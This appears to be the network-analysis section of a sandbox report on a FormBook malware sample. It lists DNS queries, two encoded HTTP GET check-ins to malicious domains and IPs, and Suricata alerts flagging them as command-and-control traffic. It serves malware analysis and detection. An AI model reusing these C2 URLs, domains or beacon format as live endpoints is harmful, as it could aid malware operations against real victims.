Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| www.xn--o39a00am61aa311e3tj68d.com | ||
| www.fillthegap.site | ||
| www.hatdieuhoanglinhlinh.com | 103.90.233.128 | |
| www.horrycountyrealtor.com | ||
| www.8wngeu.icu | 156.234.12.236 |
- UDP Requests
-
-
192.168.56.103:51935 164.124.101.2:53
-
192.168.56.103:51958 164.124.101.2:53
-
192.168.56.103:60117 164.124.101.2:53
-
192.168.56.103:60880 164.124.101.2:53
-
192.168.56.103:63183 164.124.101.2:53
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49152 239.255.255.250:3702
-
192.168.56.103:60883 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:51958
-
GET
500
http://www.hatdieuhoanglinhlinh.com/c1h5/?GVIp=U1bVErOKBwq0/qne9ly802VYsrPYaU3lSfk76VAFrq7s7GMJ2bTuzd8ISZ8Jn1imiGtcYMHa&uzu4=jjIDZjg0D0EpUr
REQUEST
RESPONSE
BODY
GET /c1h5/?GVIp=U1bVErOKBwq0/qne9ly802VYsrPYaU3lSfk76VAFrq7s7GMJ2bTuzd8ISZ8Jn1imiGtcYMHa&uzu4=jjIDZjg0D0EpUr HTTP/1.1
Host: www.hatdieuhoanglinhlinh.com
Connection: close
HTTP/1.1 500 Internal Server Error
Date: Sat, 04 Dec 2021 13:24:53 GMT
Content-Length: 21
Content-Type: text/plain; charset=utf-8
Connection: close
GET
403
http://www.8wngeu.icu/c1h5/?GVIp=zDGZ3vEmxGxSOsZI9fS37WtkChyhZfEo+Gn4TKgK29zc6+ut9iheeJAGbC/eRZmilZa7E+2d&uzu4=jjIDZjg0D0EpUr
REQUEST
RESPONSE
BODY
GET /c1h5/?GVIp=zDGZ3vEmxGxSOsZI9fS37WtkChyhZfEo+Gn4TKgK29zc6+ut9iheeJAGbC/eRZmilZa7E+2d&uzu4=jjIDZjg0D0EpUr HTTP/1.1
Host: www.8wngeu.icu
Connection: close
HTTP/1.1 403 Forbidden
Server: nginx
Date: Sat, 04 Dec 2021 13:38:06 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
ICMP traffic
| Source | Destination | ICMP Type | Data |
|---|---|---|---|
| 192.168.56.103 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.103:49164 -> 103.90.233.128:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49164 -> 103.90.233.128:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49164 -> 103.90.233.128:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| UDP 192.168.56.103:51958 -> 164.124.101.2:53 | 2026888 | ET INFO DNS Query for Suspicious .icu Domain | Potentially Bad Traffic |
| TCP 192.168.56.103:49165 -> 156.234.12.236:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49165 -> 156.234.12.236:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
| TCP 192.168.56.103:49165 -> 156.234.12.236:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts